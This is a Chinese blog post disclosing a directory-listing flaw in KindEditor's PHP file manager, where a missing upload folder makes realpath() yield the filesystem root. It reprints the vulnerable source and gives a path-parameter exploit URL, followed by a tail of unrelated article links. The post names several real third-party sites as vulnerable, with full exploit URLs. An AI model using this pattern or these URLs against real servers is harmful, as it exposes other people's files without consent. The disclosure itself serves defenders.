佚名
佚名

Kindeditor特定情况可能会导致全盘浏览的漏洞

因为例子很少,开始想了下不是他们的漏洞,后面想了下,后面没有检查好用户的正常配置内容导致,还是提下吧。

下载地址:

貌似是最新版本的。

测试语言:PHP
测试漏洞文件:/kindeditor/php/file_manager_json.php
默认配置(第16行):


$root_path = $php_path . '../attached/';

当/attached/文件夹不存在(被删)或者被改名为一个不存在的目录时,如网上的一个例子:

$root_path = $php_path . '../../../upload/';

这个CMS下面的目录根本就没得这个目录,所以就造成了漏洞。

怎么造成了漏洞的呢?我们分析下。

PHP Code 复制内容到剪贴板
  2. /**  
  3.  * KindEditor PHP  
  4.  *  
  5.  * 本PHP程序是演示程序,建议不要直接在实际项目中使用。  
  6.  * 如果您确定直接使用本程序,使用之前请仔细确认相关安全设置。  
  7.  *  
  8.  */  
  9.   
  10. require_once 'JSON.php';   
  11.   
  12. $php_path = dirname(__FILE__) . '/';   
  13. $php_url = dirname($_SERVER['PHP_SELF']) . '/';   
  14.   
  15. //根目录路径,可以指定绝对路径,比如 /var/www/attached/   
  16. $root_path = $php_path . '../../../upload/';   
  17. //根目录URL,可以指定绝对路径,比如 http://www.yoursite.com/attached/   
  18. $root_url = $php_url . '../../../upload/';   
  19. //图片扩展名   
  20. $ext_arr = array('gif''jpg''jpeg''png''bmp');   
  21.   
  22. //目录名   
  23. $dir_name = emptyempty($_GET['dir']) ? '' : trim($_GET['dir']);   
  24. if (!in_array($dir_namearray('''image''flash''media''file'))) {   
  25. echo "Invalid Directory name.";   
  26. exit;   
  27. }   
  28. if ($dir_name !== '') {   
  29. $root_path .= $dir_name . "/";   
  30. $root_url .= $dir_name . "/";   
  31. if (!file_exists($root_path)) {   
  32. mkdir($root_path);   
  33. }   
  34. }   
  35.   
  36. //根据path参数,设置各路径和URL   
  37. if (emptyempty($_GET['path'])) {   
  38. $current_path = realpath($root_path) . '/';   
  39. $current_url = $root_url;   
  40. $current_dir_path = '';   
  41. $moveup_dir_path = '';   
  42. else {   
  43. $current_path = realpath($root_path) . '/' . $_GET['path'];   
  44. $current_url = $root_url . $_GET['path'];   
  45. $current_dir_path = $_GET['path'];   
  46. $moveup_dir_path = preg_replace('/(.*?)[^\/]+\/$/''$1'$current_dir_path);   
  47. }   
  48. //echo realpath($root_path);   
  49. //排序形式,name or size or type   
  50. $order = emptyempty($_GET['order']) ? 'name' : strtolower($_GET['order']);   
  51.   
  52. //不允许使用..移动到上一级目录   
  53. if (preg_match('/\.\./'$current_path)) {   
  54. echo 'Access is not allowed.';   
  55. exit;   
  56. }   
  57. //最后一个字符不是/   
  58. if (!preg_match('/\/$/'$current_path)) {   
  59. echo 'Parameter is not valid.';   
  60. exit;   
  61. }   
  62. //目录不存在或不是目录   
  63. if (!file_exists($current_path) || !is_dir($current_path)) {   
  64. echo 'Directory does not exist.';   
  65. exit;   
  66. }   
  67.   
  68. //遍历目录取得文件信息   
  69. $file_list = array();   
  70. if ($handle = opendir($current_path)) {   
  71. $i = 0;   
  72. while (false !== ($filename = readdir($handle))) {   
  73. if ($filename{0} == '.'continue;   
  74. $file = $current_path . $filename;   
  75. if (is_dir($file)) {   
  76. $file_list[$i]['is_dir'] = true; //是否文件夹   
  77. $file_list[$i]['has_file'] = (count(scandir($file)) > 2); //文件夹是否包含文件   
  78. $file_list[$i]['filesize'] = 0; //文件大小   
  79. $file_list[$i]['is_photo'] = false; //是否图片   
  80. $file_list[$i]['filetype'] = ''//文件类别,用扩展名判断   
  81. else {   
  82. $file_list[$i]['is_dir'] = false;   
  83. $file_list[$i]['has_file'] = false;   
  84. $file_list[$i]['filesize'] = filesize($file);   
  85. $file_list[$i]['dir_path'] = '';   
  86. $file_ext = strtolower(pathinfo($file, PATHINFO_EXTENSION));   
  87. $file_list[$i]['is_photo'] = in_array($file_ext$ext_arr);   
  88. $file_list[$i]['filetype'] = $file_ext;   
  89. }   
  90. $file_list[$i]['filename'] = $filename//文件名,包含扩展名   
  91. $file_list[$i]['datetime'] = date('Y-m-d H:i:s'filemtime($file)); //文件最后修改时间   
  92. $i++;   
  93. }   
  94. closedir($handle);   
  95. }   
  96.   
  97. //排序   
  98. function cmp_func($a$b) {   
  99. global $order;   
  100. if ($a['is_dir'] && !$b['is_dir']) {   
  101. return -1;   
  102. else if (!$a['is_dir'] && $b['is_dir']) {   
  103. return 1;   
  104. else {   
  105. if ($order == 'size') {   
  106. if ($a['filesize'] > $b['filesize']) {   
  107. return 1;   
  108. else if ($a['filesize'] < $b['filesize']) {   
  109. return -1;   
  110. else {   
  111. return 0;   
  112. }   
  113. else if ($order == 'type') {   
  114. return strcmp($a['filetype'], $b['filetype']);   
  115. else {   
  116. return strcmp($a['filename'], $b['filename']);   
  117. }   
  118. }   
  119. }   
  120. usort($file_list'cmp_func');   
  121.   
  122. $result = array();   
  123. //相对于根目录的上一级目录   
  124. $result['moveup_dir_path'] = $moveup_dir_path;   
  125. //相对于根目录的当前目录   
  126. $result['current_dir_path'] = $current_dir_path;   
  127. //当前目录的URL   
  128. $result['current_url'] = $current_url;   
  129. //文件数   
  130. $result['total_count'] = count($file_list);   
  131. //文件列表数组   
  132. $result['file_list'] = $file_list;   
  133.   
  134. //输出JSON字符串   
  135. header('Content-type: application/json; charset=UTF-8');   
  136. $json = new Services_JSON();   
  137. echo $json->encode($result);  


第三十八行:

$current_path = realpath($root_path) . '/';

当$root_path被realpath以后,不存在的目录会返回空,然后连接后面的'/'

$current_path所以默认就等于'/'

当提交了$_GET['path']以后,而且$_GET['path']要以'/'为结尾(有验证),所以,我们就可以构造浏览全盘目录了。

kingedit/php/file_manager_json.php?path=/ (浏览盘符的根目录)

接着上面给出验证的(互联网找到几个):
先给本地的(attached文件夹被我删了):

Kindeditor特定情况可能会导致全盘浏览的漏洞_第1张图片

Kindeditor特定情况可能会导致全盘浏览的漏洞_第2张图片

互联网找到的:

http://demo.douco.com/admin/include/kindeditor/php/file_manager_json.php?path=home/demodoucokdce4mmohd8okuoc1o/wwwroot/&dir=image

Kindeditor特定情况可能会导致全盘浏览的漏洞_第3张图片

http://route53.com.tw/static/jscripts/kindeditor/php/file_manager_json.php?path=home/onepage/public_html/



http://www.bndvalve.com/Public/kindeditor/php/file_manager_json.php?path=wwwroot/bonade/

Kindeditor特定情况可能会导致全盘浏览的漏洞_第4张图片

修复方案:再验证下绝对路径?

你可能感兴趣的:(Kindeditor特定情况可能会导致全盘浏览的漏洞)

  • 树莓派搭php,Raspberry Pi 树莓派搭LAMP服务器 平平无奇的美女 树莓派搭php
    目录:为什么要用树莓派?DebianLinux安全性操作系统性能优化配置网络开启sshMakingtheserveravailableontheInternetDNS安装apache安全MySQL安装PHP配置完成本文将会介绍如何把树莓派配置为一台LAMP服务器.这和把XUbuntu配成LAMP服务器有些相似,但是针对树莓派有些需要特殊处理的地方.下面是LAMP服务器的最通用配置:Linux–操作
  • OpenHarmony 应用中的 Axios 封装实践与分层设计(包含请求相应拦截器) qq_55376032 harmonyos华为
    1、下载Axios三包下面是三方仓库地址OpenHarmony三方库中心仓https://ohpm.openharmony.cn/#/cn/home2、如何正确导入Axios包2-1、进入三方库2-2、复制命令行2-3、进入DevEcoStudio下载Axios(进入后我们可以快捷键Ctrl+~打开终端拖动整个目录到终端运行2-2复制的命令行)3、封装Axios方法3-1、封装方法一(全部),后续
  • 36、弱电网络技术之TCP协议灵魂 12 问,总会用得到 BinaryStarXin 网络工程师提升之路tcp/ip网络java
    TCP作为传输层的协议,是一个软件工程师素养的体现,也是面试中经常被问到的知识点。在此,我将TCP核心的一些问题梳理了一下,希望能帮到各位。001.能不能说一说TCP和UDP的区别?首先概括一下基本的区别:TCP是一个面向连接的、可靠的、基于字节流的传输层协议。而UDP是一个面向无连接的传输层协议。(就这么简单,其它TCP的特性也就没有了)。具体来分析,和UDP相比,TCP有三大核心特性:面向连接
  • 使用Python实现无人机路径规划的灰狼优化算法 闲人编程 pythonpython无人机算法灰狼优化路径规划
    目录使用Python实现无人机路径规划的灰狼优化算法引言1.灰狼优化算法概述1.1定义1.2算法原理1.3灰狼的狩猎策略1.4算法步骤2.Python中的灰狼优化算法实现2.1安装必要的库2.2定义类2.2.1灰狼类2.2.2群体类2.2.3路径规划类2.3示例程序3.灰狼优化算法的优缺点3.1优点3.2缺点4.改进方向5.应用场景结论使用Python实现无人机路径规划的灰狼优化算法引言无人机的路
  • 如何测试模型的推理速度 想要躺平的一枚 AI图像算法计算机视觉
    前言模型的推理速度测试有两种方式:一种是使用python的时间戳time函数来记录,另一种是使用Pytorch里的Event。同时,在进行GPU测试时,为减少冷启动的状态影响,可以先进行预热。代码如下(示例):if__name__=="__main__":model=BiSeNet(backbone='STDCNet813',n_classes=2,export=True)model.cuda()
  • Python tkinter设置背景颜色 乙龙 python开发语言
    在Python的tkinter库中,设置组件的背景颜色通常使用bg选项,通过config方法来实现。以下是一些设置背景颜色的基本示例:设置单个组件的背景颜色:widget.config(bg='color')其中widget是tkinter组件的实例,color可以是颜色名称(如'red','blue'等)或者十六进制颜色代码(如'#FF5733')。创建窗口并设置背景颜色:importtkint
  • 麒麟系统如何安装Anaconda 乙龙 pythonkylin
    在银河麒麟操作系统(KylinOS)中安装Anaconda的步骤相对简单,以下是基于搜索结果整理的详细安装指南:步骤1:下载Anaconda安装脚本打开浏览器,访问Anaconda官方下载页面。选择适合Linux系统的安装脚本(通常是.sh文件)。银河麒麟系统基于Linux,因此可以选择Linux版本的Anaconda安装脚本。例如,下载最新版本的Anaconda3安装脚本:wgethttps:/
  • TCP/IP协议知识梳理 风间琉璃zero 知识梳理#网络相关网络协议tcp/ip
    TCP/IP协议知识梳理一、计算机网络体系结构分层二、TCP/IP基础1.TCP/IP的具体含义2.数据包3.数据处理流程①应用程序处理②TCP模块的处理③IP模块的处理④网络接口(以太网驱动)的处理⑤网络接口(以太网驱动)的处理⑥IP模块的处理⑦TCP模块的处理⑧应用程序的处理三、传输层中的TCP和UDP1.端口号1.1根据端口号识别应用1.2通过IP地址、端口号、协议号进行通信识别1.3端口号
  • 普通人如何在2025年入百万!? 中国CSDN一定能给你答案 AI黑客 qt游戏引擎人工智能前端个人开发
    我之前发的帖子在下面90后的疯狂逆袭:从辞职零收入到宅家暴赚300万,手把手教你收割互联网红利!我的主页:AI黑客-CSDN博客做任何事情知其然才能知其所以然万丈高楼平地起不要想着一口气吃个金娃娃都是一步一步来的。学习也好做人也罢都是要循序渐进的!我今年又再次更新了超级多干货-每日更新的:极致助力让新手就算是六十岁的新手也能让你年入百万!
  • 新建PyCharm以及文件和代码模板 老虎也淘气 Python编程掌握指南pycharmpythonide
    本文主要帮助新人新建PyCharm文件初步了解和代码模板的建立。在这里,我将为您提供在PyCharm中创建项目、文件和代码模板的简单步骤。请注意,PyCharm版本可能会在时间推移中有所更改,因此这里提供的指导是基于2021年9月的知识。如果您使用的是更高版本,界面可能略有不同,但大致概念是相似的。前言:在当今的软件开发领域中,高效而智能的开发工具是每位开发者追求的目标之一。对于Python开发者
  • 使用pycharm生成csv用例,并引用用例内容。 青萍之末惹风起 python
    下面是一个论坛社区的单接口测试,CNode:Node.js专业中文社区#调用csvimportcsv#tab是主题分类tab_v=['ask','share','job','good']#limit是每一页发帖总条数最大为50条limit_v=[1,50,51]#定义空列表,写入循环内容test_tab_limit_data=[]fortabintab_v:forlimitinlimit_v:""
  • 计算机网络知识点全梳理(一.TCP/IP网络模型) hrhcode 计算机网络计算机网络tcp/ip网络
    目录TCP/IP网络模型概述应用层什么是应用层应用层功能应用层协议传输层什么是传输层传输层功能传输层协议网络层什么是网络层网络层功能网络层协议数据链路层什么是数据链路层数据链路层功能物理层物理层的概念和功能写在前面本系列文章:计算机网络知识点全梳理(二.HTTP知识点总结)计算机网络知识点全梳理(三.TCP知识点总结)计算机网络知识点全梳理(四.IP知识点总结)TCP/IP网络模型概述在同一台设备
  • 树莓派raspberry搭建web服务(基于LAMP) 最古琴
    撸了今年阿里、头条和美团的面试,我有一个重要发现.......>>>本文永久地址:https://my.oschina.net/bysu/blog/15502121.安装apachesudoapt-getinstallapache2php-gdphp安装完之后,怎么确认是否安装成功了呢?可以通过以下几种方式确认。a.可以查看是否已有相应的服务ps-ef|grepapache会看到4条服务,其中主进
  • nweb_nweb:小型安全的Web服务器(仅静态页面) cusi77914 pythonlinuxjavasocket编程语言
    您是否曾经想过运行一个小型,安全的Web服务器,而不必担心使用安装和配置可能很复杂的功能强大的Web服务器?您是否想知道如何编写一个通过网络套接字接收传入消息的程序?您是否曾经希望自己的Web服务器进行试验和学习?2012年将进行进一步更新,以支持最新的Web服务器和浏览器标准以及代码更新。好吧,别无所求-nweb是您所需要的。这是一个只有200行C源代码的简单Web服务器。它以常规用户身份运行,
  • 方案精读:185页PPT基于IPD流程的研发项目管理讲座 智慧化智能化数字化方案 项目经理售前工程师技能提升IPD流程体系IPD研发管理ipd项目管理IPD流程管理IPD端到端IPD流程细则IPD基础知识
    (本解读资料未包含于绑定资源内)绑定资源文档清单:2024版基于华为IPD与质量管理体系融合的研发质量管理(63页).pptxIPD流程操作细则(55页).pptxIPD的基础知识介绍(54页).pptIPD端到端流程培训方案【115页PPT】.ppt华为IPDCMM项目管理培训教材(41页).pptx华为IPD流程体系设计方法论(123页).pptx华为IPD项目管理“六步一法”.ppt华为的I
  • TCP的通信过程 姬浩然 pythontcp通信过程的实现python
    3.TCP通信过程3.1编码解码ipython3工具安装pip3installipython3s="hellodage"#str类型不能直接在网络中传输如果需要传输需要转换为Bytes二进制字节类型#utf-8编码情况一个汉字3个字节;GBK编码情况下一个汉字2字节s1="hello大哥"#str-编码->bytes二进制数据=字符串数据.encode(encoding='utf-8')In[8]
  • 数字化建设经营管理平台解决方案(34页PPT)(文末有下载方式) 极客11 大数据人工智能物联网
    数字化建设经营管理平台解决方案详细解读详细资料请看本解读文章的最后内容。在当今数字化浪潮中,企业经营管理平台的构建已成为提升企业核心竞争力的关键。本文将对《数字化建设经营管理平台解决方案》进行详细解读,深入剖析其核心理念、业务场景、平台建设方案及核心功能,帮助企业更好地理解并应用这一解决方案。一、企业经营管理平台建设的理念企业经营管理平台的建设理念围绕“三驾马车”展开,即战略规划与决策、执行反馈和
  • WHUCS-计算机系统基础(CSAPP)-Lab 1-DataLab实现 THEKOIFISH linuxCSAPPC语言课程实验
    武汉大学计算机系统基础(CSAPP)课程中datalab的实现。目录前言一、实验前的准备二、实验限制1.dlc2.btest三、代码撰写1.bitOr2.anyEvenBit3.rotateLeft4.greatestBitPos5.leastBitPos6.subOK7.satMul38.divpwr29.float_abs10.float_i2f四、编译执行总结前言DataLab是《深入了解计
  • html css 笔记 小箌 htmlcss笔记
    01_浏览器相关知识五大主流浏览器:ChromeSafariIEFirefoxOpera(拥有自己的内核)四大内核:webkitTridentGeckoblink.02_网页相关知识构成网址网站网页网页标准:结构表现行为分别对应HTMLCSSJavaScript03_HTML简介HTML是什么译为:标记语言超文本:比普通的文本信息含量更多04_HTML初体验保存:Ctrl+S后缀:.html程序员
  • Postman用JSON格式数据发送POST请求及注意事项 luckyext postmanjson测试工具前端c#java后端
    一.Postman用JSON格式数据发送POST请求流程如下选择请求方式为POST输入要测试的API的URL选择Body标签选择raw选择JSON输入JSON格式的参数点击“Send”按钮在响应区,分析回复结果二.发送POST请求示例向api接口http://127.0.0.1:1880/api/x1/postmsg发送请求的示例如下三.注意事项如果所测试的API需要token,在点击发送之前需要
  • 玩转github 黄白柴柴 githubgithub
    megithub可以给仓库添加开发人员吗4o是的,GitHub允许仓库管理员为仓库添加开发人员,并设置这些开发人员的角色和权限。这里是一个简单的步骤指导,教你如何给一个GitHub仓库添加开发人员:前提条件你必须有这个仓库的权限(通常是Owner或Maintainer)。对于私有仓库和组织仓库,你需要确保对方有一个GitHub账户。步骤1:前往仓库的设置页面打开你的GitHub仓库。点击页面右上角
  • 麒麟系统利用pycharm生成deb文件 乙龙 kylin
    在麒麟系统(KylinOS)上使用PyCharm进行Python开发并生成.deb可安装软件包,可以按照以下步骤进行操作:1.准备工作安装PyCharm:确保已经在麒麟系统上安装了PyCharm,可以使用官方提供的安装包进行安装。安装必要的工具和依赖:确保系统中安装了dpkg、debhelper等工具,这些工具用于创建和管理.deb包。sudoapt-getinstalldpkgdebhelper
  • 头歌-软件测试-黑盒测试用例 宝儿652 测试用例
    第1关:等价类划分法#include"func.h"#include//计算直角三角形的斜边长度floatcalcEdge(floata,floatb,floatarea);voidBlackTest1(){/*请按要求设计测试用例,并调用calcEdge*//*********Begin********/calcEdge(5,-1,-1);calcEdge(-1,5,-1);calcEdge(3
  • Java虚拟线程的概念与实操 贝克街的小码农 Java实战方案javapython开发语言
    Java虚拟线程介绍背景在传统的Java并发编程中,线程(Thread)是并发执行的基本单位。然而,操作系统线程(OS线程)的创建和上下文切换开销较大,尤其是在高并发场景下,创建大量线程会导致系统资源耗尽,性能下降。为了解决这个问题,Java19引入了虚拟线程(VirtualThreads),作为ProjectLoom的一部分。虚拟线程是一种轻量级的线程,由JVM进行管理,而不是直接依赖操作系统线
  • Redis 持久化方案对比 贝克街的小码农 Java实战方案redis数据库缓存
    Redis提供了两种主要的持久化方案:RDB(RedisDatabaseBackup)和AOF(Append-OnlyFile)。每种方案都有其优缺点,适用于不同的场景。以下是它们的对比及实际操作方案。1.RDB持久化1.1概述RDB是Redis默认的持久化方式。它通过生成数据集的快照(snapshot)来保存数据。快照是二进制文件,保存了某个时间点的完整数据。1.2优点性能高:RDB是快照方式,
  • 到底选谁?oelove 婚恋系统10.0和金媒10.3都升级了 weixin_wx520-1983 小程序
    目前都是婚庆类程序的佼佼者,两套系统很多网友不知道选哪个!我分享下我的建议,两套系统我都有目前OElove旗舰版(含商城插件+情感系统插件)金媒最新也是10.3旗舰版。1.对比性能架构两套系统我都在用,性能方面的话OElove因为非全开源所以运行效率要低一些特别是早期5.0之前版本运行期来就更慢了,体验滑坡,后来官方又把架构重新写了一边速度块了很多,金媒程序本身是全开源所以运行没问题。2.功能和稳
  • 彻底解决Niushop单商户v4升级v5遇到的各种bug问题这是精粹总结,希望各位少走弯路 weixin_wx520-1983 niushop提示未授权当前系统未授权
    熟悉niushop的老铁都应该注意到近半年期间Niushop升级频率明显变少了,原来官方都去忙活V5了,新内核好再哪里我就不说了老铁自己去了解哈这不是我们说的重点,V4最终版定在了V4.2.0也就是说从这里开始再升级就升级到V5了,但是我发现升级后会出现各种莫名奇妙的问题!比如说访问店铺时候提示:又比如访问H5页面时候无法载入首页"当前手机页面无法访问请检查手机端域名配置以及伪静态"其实这些问题都
  • python核心编程电子书_Python核心编程 PDF 超清第3版 weixin_39976733 python核心编程电子书
    给大家带来的一篇关于Python编程相关的电子书资源,介绍了关于Python编程、Python核心编程方面的内容,本书是由人民邮电出版社出版,格式为PDF,资源大小22.4MB,卫斯理编写,目前豆瓣、亚马逊、当当、京东等电子书综合评分为:7.5。内容介绍全方位包含现如今应用程序开发中的诸多行业为初级Python开发者出示优秀实践活动方式包含很多好用的编码实例每章结尾的练习题有利于推进所教专业知识想
  • 亲测有用,轻松解决远程链接的“Gtk-WARNING **: cannot open display;”或“Cannot connect to display;”问题 柳柳的博客 pyppeteerlinux
    远程连接服务器或者工作站的时候,通常不能打开一个GUI图形用户,而且在打开过程中会出现诸如:(gedit:46927):Gtk-WARNING**:cannotopendisplay:或者:指令名:Cannotconnecttodisplay的提示。那么如何解决这个问题呢?把它分为两种链接方式:用windows下的cmd链接远程的linux,另一种是用本地的linux系统链接远程的linux(两种
  • 深入理解 Android 中的 ViewModel 和 LiveData:实现数据与 UI 的分离与响应式更新 tangweiguo03051987 androidandroiduiViewModelLiveData
    ViewModel和LiveData是Android架构组件中的两个核心类,用于帮助开发者构建健壮、可维护且响应迅速的应用程序。它们通常一起使用,以实现数据与UI的分离,并确保数据在配置更改(如屏幕旋转)时不会丢失。ViewModelViewModel的主要目的是管理与UI相关的数据,并在配置更改时保持数据的持久性。它允许数据在Activity或Fragment销毁和重新创建时保持不变。1.1Vi
  • jdk tomcat 环境变量配置 Array_06 javajdktomcat
    Win7 下如何配置java环境变量 1。准备jdk包,win7系统,tomcat安装包(均上网下载即可) 2。进行对jdk的安装,尽量为默认路径(但要记住啊!!以防以后配置用。。。) 3。分别配置高级环境变量。   电脑-->右击属性-->高级环境变量-->环境变量。 分别配置 : path    &nbs
  • Spring调SDK包报java.lang.NoSuchFieldError错误 bijian1013 javaspring
            在工作中调另一个系统的SDK包,出现如下java.lang.NoSuchFieldError错误。 org.springframework.web.util.NestedServletException: Handler processing failed; nested exception is java.l
  • LeetCode[位运算] - #136 数组中的单一数 Cwind java题解位运算LeetCodeAlgorithm
    原题链接:#136 Single Number 要求: 给定一个整型数组,其中除了一个元素之外,每个元素都出现两次。找出这个元素 注意:算法的时间复杂度应为O(n),最好不使用额外的内存空间 难度:中等 分析: 题目限定了线性的时间复杂度,同时不使用额外的空间,即要求只遍历数组一遍得出结果。由于异或运算 n XOR n = 0, n XOR 0 = n,故将数组中的每个元素进
  • qq登陆界面开发 15700786134 qq
    今天我们来开发一个qq登陆界面,首先写一个界面程序,一个界面首先是一个Frame对象,即是一个窗体。然后在这个窗体上放置其他组件。代码如下: public class First {         public void initul(){        jf=ne
  • Linux的程序包管理器RPM 被触发 linux
    在早期我们使用源代码的方式来安装软件时,都需要先把源程序代码编译成可执行的二进制安装程序,然后进行安装。这就意味着每次安装软件都需要经过预处理-->编译-->汇编-->链接-->生成安装文件--> 安装,这个复杂而艰辛的过程。为简化安装步骤,便于广大用户的安装部署程序,程序提供商就在特定的系统上面编译好相关程序的安装文件并进行打包,提供给大家下载,我们只需要根据自己的
  • socket通信遇到EOFException 肆无忌惮_ EOFException
    java.io.EOFException at java.io.ObjectInputStream$PeekInputStream.readFully(ObjectInputStream.java:2281) at java.io.ObjectInputStream$BlockDataInputStream.readShort(ObjectInputStream.java:
  • 基于spring的web项目定时操作 知了ing javaWeb
    废话不多说,直接上代码,很简单 配置一下项目启动就行 1,web.xml <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="h
  • 树形结构的数据库表Schema设计 矮蛋蛋 schema
    原文地址: http://blog.csdn.net/MONKEY_D_MENG/article/details/6647488     程序设计过程中,我们常常用树形结构来表征某些数据的关联关系,如企业上下级部门、栏目结构、商品分类等等,通常而言,这些树状结构需要借助于数据库完成持久化。然而目前的各种基于关系的数据库,都是以二维表的形式记录存储数据信息,
  • maven将jar包和源码一起打包到本地仓库 alleni123 maven
    http://stackoverflow.com/questions/4031987/how-to-upload-sources-to-local-maven-repository <project> ... <build> <plugins> <plugin> <groupI
  • java IO操作 与 File 获取文件或文件夹的大小,可读,等属性!!! 百合不是茶
    类 File File是指文件和目录路径名的抽象表示形式。 1,何为文件: 标准文件(txt doc mp3...) 目录文件(文件夹) 虚拟内存文件   2,File类中有可以创建文件的 createNewFile()方法,在创建新文件的时候需要try{} catch(){}因为可能会抛出异常;也有可以判断文件是否是一个标准文件的方法isFile();这些防抖都
  • Spring注入有继承关系的类(2) bijian1013 javaspring
    被注入类的父类有相应的属性,Spring可以直接注入相应的属性,如下所例:1.AClass类 package com.bijian.spring.test4; public class AClass { private String a; private String b; public String getA() { retu
  • 30岁转型期你能否成为成功人士 bijian1013 成长励志
            很多人由于年轻时走了弯路,到了30岁一事无成,这样的例子大有人在。但同样也有一些人,整个职业生涯都发展得很优秀,到了30岁已经成为职场的精英阶层。由于做猎头的原因,我们接触很多30岁左右的经理人,发现他们在职业发展道路上往往有很多致命的问题。在30岁之前,他们的职业生涯表现很优秀,但从30岁到40岁这一段,很多人
  • 【Velocity四】Velocity与Java互操作 bit1129 velocity
    Velocity出现的目的用于简化基于MVC的web应用开发,用于替代JSP标签技术,那么Velocity如何访问Java代码.本篇继续以Velocity三http://bit1129.iteye.com/blog/2106142中的例子为基础,      POJO    package com.tom.servlets; public
  • 【Hive十一】Hive数据倾斜优化 bit1129 hive
    什么是Hive数据倾斜问题   操作:join,group by,count distinct 现象:任务进度长时间维持在99%(或100%),查看任务监控页面,发现只有少量(1个或几个)reduce子任务未完成;查看未完成的子任务,可以看到本地读写数据量积累非常大,通常超过10GB可以认定为发生数据倾斜。 原因:key分布不均匀 倾斜度衡量:平均记录数超过50w且
  • 在nginx中集成lua脚本:添加自定义Http头,封IP等 ronin47 nginx lua csrf
    Lua是一个可以嵌入到Nginx配置文件中的动态脚本语言,从而可以在Nginx请求处理的任何阶段执行各种Lua代码。刚开始我们只是用Lua 把请求路由到后端服务器,但是它对我们架构的作用超出了我们的预期。下面就讲讲我们所做的工作。 强制搜索引擎只索引mixlr.com Google把子域名当作完全独立的网站,我们不希望爬虫抓取子域名的页面,降低我们的Page rank。 location /{
  • java-3.求子数组的最大和 bylijinnan java
    package beautyOfCoding; public class MaxSubArraySum { /** * 3.求子数组的最大和 题目描述: 输入一个整形数组,数组里有正数也有负数。 数组中连续的一个或多个整数组成一个子数组,每个子数组都有一个和。 求所有子数组的和的最大值。要求时间复杂度为O(n)。 例如输入的数组为1, -2, 3, 10, -4,
  • Netty源码学习-FileRegion bylijinnan javanetty
    今天看org.jboss.netty.example.http.file.HttpStaticFileServerHandler.java 可以直接往channel里面写入一个FileRegion对象,而不需要相应的encoder: //pipeline(没有诸如“FileRegionEncoder”的handler): public ChannelPipeline ge
  • 使用ZeroClipboard解决跨浏览器复制到剪贴板的问题 cngolon 跨浏览器复制到粘贴板Zero Clipboard
    Zero Clipboard的实现原理 Zero Clipboard 利用透明的Flash让其漂浮在复制按钮之上,这样其实点击的不是按钮而是 Flash ,这样将需要的内容传入Flash,再通过Flash的复制功能把传入的内容复制到剪贴板。 Zero Clipboard的安装方法 首先需要下载 Zero Clipboard的压缩包,解压后把文件夹中两个文件:ZeroClipboard.js
  • 单例模式 cuishikuan 单例模式
    第一种(懒汉,线程不安全): public class Singleton {   2     private static Singleton instance;   3     pri
  • spring+websocket的使用 dalan_123
    一、spring配置文件 <?xml version="1.0" encoding="UTF-8"?><beans xmlns="http://www.springframework.org/schema/beans"    xmlns:xsi="http://www.w3.or
  • 细节问题:ZEROFILL的用法范围。 dcj3sjt126com mysql
    1、zerofill把月份中的一位数字比如1,2,3等加前导0 mysql> CREATE TABLE t1 (year YEAR(4), month INT(2) UNSIGNED ZEROFILL,    -> day
  • Android开发10——Activity的跳转与传值 dcj3sjt126com Android开发
    Activity跳转与传值,主要是通过Intent类,Intent的作用是激活组件和附带数据。   一、Activity跳转 方法一Intent intent = new Intent(A.this, B.class); startActivity(intent)   方法二Intent intent = new Intent();intent.setCla
  • jdbc 得到表结构、主键 eksliang jdbc 得到表结构、主键
    转自博客:http://blog.csdn.net/ocean1010/article/details/7266042 假设有个con DatabaseMetaData dbmd = con.getMetaData(); rs = dbmd.getColumns(con.getCatalog(), schema, tableName, null); rs.getSt
  • Android 应用程序开关GPS gqdy365 android
    要在应用程序中操作GPS开关需要权限: <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" /> 但在配置文件中添加此权限之后会报错,无法再eclipse里面正常编译,怎么办? 1、方法一:将项目放到Android源码中编译; 2、方法二:网上有人说cl
  • Windows上调试MapReduce zhiquanliu mapreduce
    1.下载hadoop2x-eclipse-plugin https://github.com/winghc/hadoop2x-eclipse-plugin.git 把 hadoop2.6.0-eclipse-plugin.jar 放到eclipse plugin 目录中。 2.下载 hadoop2.6_x64_.zip http://dl.iteye.com/topics/download/d2b
  • 如何看待一些知名博客推广软文的行为? justjavac 博客
    本文来自我在知乎上的一个回答:http://www.zhihu.com/question/23431810/answer/24588621 互联网上的两种典型心态: 当初求种像条狗,如今撸完嫌人丑 当初搜贴像条犬,如今读完嫌人软 你为啥感觉不舒服呢? 难道非得要作者把自己的劳动成果免费给你用,你才舒服? 就如同 Google 关闭了 Gooled Reader,那是
  • sql优化总结 macroli sql
    为了是自己对sql优化有更好的原则性,在这里做一下总结,个人原则如有不对请多多指教。谢谢!   要知道一个简单的sql语句执行效率,就要有查看方式,一遍更好的进行优化。   一、简单的统计语句执行时间 declare @d datetime ---定义一个datetime的变量set @d=getdate() ---获取查询语句开始前的时间select user_id
  • Linux Oracle中常遇到的一些问题及命令总结 超声波 oraclelinux
    1.linux更改主机名   (1)#hostname oracledb    临时修改主机名 (2) vi /etc/sysconfig/network   修改hostname (3) vi /etc/hosts        修改IP对应的主机名   2.linux重启oracle实例及监听的各种方法 (注意操作的顺序应该是先监听,后数据库实例) &nbs
  • hive函数大全及使用示例 superlxw1234 hadoophive函数
      具体说明及示例参 见附件文档。     文档目录:   目录 一、关系运算: 4 1. 等值比较: = 4 2. 不等值比较: <> 4 3. 小于比较: < 4 4. 小于等于比较: <= 4 5. 大于比较: > 5 6. 大于等于比较: >= 5 7. 空值判断: IS NULL 5
  • Spring 4.2新特性-使用@Order调整配置类加载顺序 wiselyman spring 4
    4.1 @Order Spring 4.2 利用@Order控制配置类的加载顺序 4.2 演示 两个演示bean package com.wisely.spring4_2.order; public class Demo1Service { } package com.wisely.spring4_2.order; public class
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他